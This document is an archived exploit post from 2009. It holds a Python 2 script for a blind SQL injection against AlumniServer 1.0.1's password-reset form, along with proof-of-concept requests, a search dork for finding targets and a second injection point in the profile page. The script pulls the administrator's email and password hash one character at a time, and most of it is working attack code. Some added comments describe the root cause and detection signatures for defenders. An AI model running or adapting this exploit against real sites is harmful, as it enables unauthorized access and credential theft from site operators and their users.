
alumniserver-blindsql.txt

Posted on 26 June 2009

#!/usr/bin/python
#--------------------------------------------------------------------------------
#(POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-->
#--------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.alumniserver.net/
#-->DOWNLOAD: http://www.alumniserver.net/
#-->DEMO: N/A
#-->CATEGORY: CMS/Education
#-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools
#                and companies. Services for users include profile page,...
#-->RELEASED: 2009-06-11
#
#CMS VULNERABILITY:
#
#-->TESTED ON: Python 2.6
#-->DORK: "AlumniServer project"
#-->CATEGORY: BSQLi PYTHON EXPLOIT
#-->AFFECT VERSION: CURRENT
#-->Discovered Bug date: 2009-06-15
#-->Reported Bug date: 2009-06-15
#-->Fixed bug date: N/A
#-->Info patch (????): N/A
#-->Author: YEnH4ckEr
#-->mail: y3nh4ck3r[at]gmail[dot]com
#-->WEB/BLOG: N/A
#-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
#-->EXTRA-COMMENT: Thanks to all of you for putting up with me! (Love you, little one!)
#
#------------
#CONDITIONS:
#------------
#
#magic quotes=OFF
#
#--------
#NEEDED:
#--------
#
#Valid email
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#POST http://[HOST]/[PATH]/Password.php HTTP/1.1
#Host: [HOST]
#Referer: http://[HOST]/[PATH]/Password.php
#Content-Type: application/x-www-form-urlencoded
#
#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE
#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE
#
#Other P0C (with a registered user):
#
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
#
#--------------
#WATCH VIDEOS
#--------------
#
# BSQLi --> http://www.youtube.com/watch?v=K3z7iyHttBw
#
# AUTH BYPASS --> http://www.youtube.com/watch?v=UjDm2p7qHj0
#
#
#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...   ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community!                             ##
##*******************************************************************##
#######################################################################
#######################################################################
#
"""Boolean-based blind SQL injection PoC against AlumniServer 1.0.1 (Password.php).

How it works (everything is visible in the code below): each probe is one
HTTP POST to http://[HOST]/[PATH]/Password.php whose `resetpwemail` field is
a valid address followed by an unescaped single quote and an injected `AND`
condition.  The response is read as a boolean oracle: the reset-confirmation
text "You will receive an email shortly with a link that enables you to reset
your password." appears when the injected condition is true and does not
appear when it is false.

Notes for defenders:
  * Root cause is string-built SQL on the `resetpwemail` parameter; the
    "magic quotes=OFF" precondition in the header shows the application
    relied on that PHP setting rather than on parameterized queries.
    Prepared statements / proper escaping in Password.php (and in
    Profile.php, per the second PoC in the header) close the issue
    regardless of the magic_quotes setting.
  * Observable signature: a burst of password-reset POSTs from one client,
    all for the same address, with `'+AND+` / `%27+and+` inside
    `resetpwemail`.  Recovering one character costs up to 95 such requests
    (ASCII 32..126 are tried in order), so a full run issues on the order of
    thousands of reset requests for a single address.
  * The script is Python 2 only (print statements, urllib2).
"""

#Used modules
import urllib2,sys,re,os

#Defined functions
def init():
    """Clear the console (cls/title/color on win32, clear elsewhere) and print the banner."""
    if(sys.platform=='win32'):
        os.system("cls")
        os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit")
        os.system ("color 02")
    else:
        os.system("clear")
    print " ####################################################### "
    print " ####################################################### "
    print " ## AlumniServer v-1.0.1 Blind SQLi Exploit ## "
    print " ## ++Conditions: magic_quotes=OFF ## "
    print " ## ++Needed: Valid mail ## "
    print " ## Author: Y3nh4ck3r ## "
    print " ## Contact:y3nh4ck3r[at]gmail[dot]com ## "
    print " ## Proud to be Spanish! ## "
    print " ####################################################### "
    print " ####################################################### "

def request(urltarget,postmsg):
    """Send one HTTP POST to `urltarget` with body `postmsg` and return the response body.

    Uses urllib2 with no timeout, no headers beyond urllib2's defaults and no
    error handling: anything urllib2.urlopen raises (URLError / HTTPError)
    propagates to the caller, and no caller in this file catches it.
    """
    req=urllib2.Request(url=urltarget,data=postmsg)
    conn = urllib2.urlopen(req)
    outcode=conn.read()
    #print outcode  #--> uncomment this line to dump the raw response (debug mode)
    return outcode

def error():
    """Print the 'not vulnerable' diagnosis and terminate the process via sys.exit()."""
    print " ------------------------------------------------------------ "
    print " Web isn't vulnerable! "
    print " --->Maybe: "
    print " 1.-Patched. "
    print " 2.-Bad path or host. "
    print " 3.-Bad mail. "
    print " 4.-Magic quotes ON. "
    print " EXPLOIT FAILED! "
    print " ------------------------------------------------------------ "
    sys.exit()

def testedblindsql():
    """Print the banner shown once the true/false probe responses differ."""
    print " ----------------------------------------------------------------- "
    print " WEB MAYBE BE VULNERABLE! "
    print " Tested Blind SQL Injection. "
    print " Starting exploit... "
    print " ----------------------------------------------------------------- "

def helper(filename):
    """Print the usage text (with `filename` as the script name) and exit via sys.exit()."""
    print " [!!!] AlumniServer v-1.0.1 Blind SQL Injection Exploit "
    print " [!!!] USAGE MODE: [!!!] "
    print " [!!!] python "+filename+" [HOST] [PATH] [MAIL] [ID_ADMIN/HIDDEN/BRUTEFORCEID] "
    print " [!!!] [HOST]: Web. "
    print " [!!!] [PATH]: Home Path. "
    print " [!!!] [MAIL]: Mail for fish "
    print " [!!!] [ID_ADMIN/HIDDEN/BRUTEFORCEID]: Id_admin if we are registered users or 'hidden' value if admin is hidden. "
    print " [!!!] Also can use 'bruteforceid' value for bruteforce admin id previously. "
    print " [!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com cd54cd7df99a "
    print " [!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com hidden "
    print " [!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com bruteforceid "
    sys.exit()

def brute_length(urlrequest, idadmin, mail):
    """Return the length of the targeted `email` value in as_users, found by linear search.

    One POST per candidate length i = 1, 2, 3, ...; the candidate is accepted
    when the reset-confirmation text is present in the response.  If i passes
    50 without a hit, error() is called, which exits the process.  The row is
    selected by `hideuser='y'` when idadmin == "hidden", otherwise by
    `id = idadmin`.  (The original comment said "Username length"; it is the
    email column that is measured.)
    """
    #Length of the email column
    flag=1
    i=0
    while(flag==1):
        i=i+1
        if(idadmin=="hidden"):
            blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+hideuser='y')='"+str(i) #injected code
        else:
            blindsql="resetpwemail="+mail+"'+AND+(SELECT+length(email)+FROM+as_users+WHERE+id='"+idadmin+"')='"+str(i) #injected code
        output=request(urlrequest, blindsql)
        #The confirmation text is the boolean oracle: present == injected condition true
        if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
            flag=2
        else:
            flag=1
        #This is the max length of email; error() exits, so the loop cannot run past 50 probes
        if (i>50):
            error()
    #Save column length
    length=i
    print " <<<<<--------------------------------------------------------->>>>> "
    print " Length catched! "
    print " Length E-mail --> "+str(length)+" "
    print " Wait several minutes... "
    print " <<<<<--------------------------------------------------------->>>>> "
    return length

def exploiting (lengthvalue, urlrequest, column, idadmin, mail):
    """Recover `column` of the targeted as_users row one character at a time.

    For position k (1..lengthvalue) the ASCII code z is tried from 32 upward;
    a response containing the reset-confirmation text accepts chr(z) and
    moves on to the next position.  The loop also stops when z exceeds 126,
    i.e. when no printable ASCII value matched, in which case the partial
    string collected so far is returned.  Row selection is the same as in
    brute_length() (hideuser='y' for "hidden", else id = idadmin).
    """
    #Bruteforcing values
    values=""
    k=1
    z=32
    while((k<=lengthvalue) and (z<=126)):
        #Choose method, hidden or with id
        if(idadmin=="hidden"):
            blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+hideuser='y'),"+str(k)+",1))='"+str(z) #injected code
        else:
            blindsql="resetpwemail="+mail+"'+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+id='"+idadmin+"'),"+str(k)+",1))='"+str(z) #injected code
        output=request(urlrequest, blindsql)
        if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
            values=values+chr(z)
            k=k+1
            z=32 #new char
        z=z+1
    return values

def exploiting_id (urlrequest, mail):
    """Recover the `id` of the as_users row with the smallest `membersince`, hex digit by hex digit.

    Positions 1..12 are tried; for each, the candidates 0-9 and a-f are sent
    in order and the first one whose response contains the reset-confirmation
    text is appended.  Note that `z='g'` does not leave the inner `for`, and
    a position with no matching candidate never advances k, so the outer
    `while` would not terminate in that case.
    """
    #Bruteforcing values
    values=""
    #Possible values of id
    arrayids=[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f']
    k=1
    #Max length of id = 12
    while(k<=12):
        for z in arrayids:
            blindsql="resetpwemail="+mail+"'+AND+substring((SELECT+id+FROM+as_users+HAVING+MIN(membersince)),"+str(k)+",1)='"+str(z) #injected code
            output=request(urlrequest, blindsql)
            if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
                values=values+str(z)
                k=k+1
                z='g'
    return values

#Main
#Script entry point: argv = [script, HOST, PATH, MAIL, ID_ADMIN|hidden|bruteforceid].
#There is no __main__ guard, so importing this module runs everything below.
init()
#Init variables
if(len(sys.argv) <= 4):
    helper(sys.argv[0])
host=sys.argv[1]
path=sys.argv[2]
mail=sys.argv[3]
#Define mode: ID, hidden or bruteforceid
if(sys.argv[4]=="hidden"):
    mode="hidden"
elif(sys.argv[4]=="bruteforceid"):
    mode="bruteforceid"
else:
    mode="usual"
    idadmin=sys.argv[4]
#Plain http, no TLS: the probes (and the recovered values) travel in clear text
finalrequest="http://"+host+"/"+path+"/Password.php"
#Sanity check: a true and a false condition must yield different responses,
#otherwise the parameter is not acting as a boolean oracle
testblind1="resetpwemail="+mail+"%27+and+1%3D%271" #Return true
outcode1=request(finalrequest,testblind1)
testblind2="resetpwemail="+mail+"%27+and+1%3D%270" #Return false
outcode2=request(finalrequest,testblind2)
#Check BSQLi
if(outcode1==outcode2):
    error()
else:
    testedblindsql()
if(mode=="usual"):
    #Catching length of admin email
    lengthadmin=brute_length(finalrequest, idadmin, mail)
    mailadmin=exploiting(lengthadmin, finalrequest, "email", idadmin, mail)
    #Catching value of password (hashed md5)
    passwordhash=exploiting(32, finalrequest, "password", idadmin, mail)
elif(mode=="hidden"):
    #Catching length of admin email
    lengthadmin=brute_length(finalrequest, "hidden", mail)
    mailadmin=exploiting(lengthadmin, finalrequest, "email", "hidden", mail)
    #Catching value of password (hashed md5)
    passwordhash=exploiting(32, finalrequest, "password", "hidden", mail)
else:
    print " <<<<<--------------------------------------------------------->>>>> "
    print " Bruteforcing id. Wait a few minutes... "
    print " <<<<<--------------------------------------------------------->>>>> "
    #Catching value of admin id
    idadmin=exploiting_id(finalrequest, mail)
print " ************************************************* "
print " ********* EXPLOIT EXECUTED SUCCESSFULLY ******** "
print " ************************************************* "
#Mode usual and hidden
if((mode=="usual") or (mode=="hidden")):
    print " Admin-mail: "+mailadmin+" "
    print " Password hash: "+passwordhash+" "
else:
    #Mode bruteforceid
    print " Admin-id: "+idadmin+" "
print " <<----------------------FINISH!-------------------->> "
print " <<---------------Thanks to: y3nh4ck3r-------------->> "
print " <<------------------------EOF---------------------->> "

 

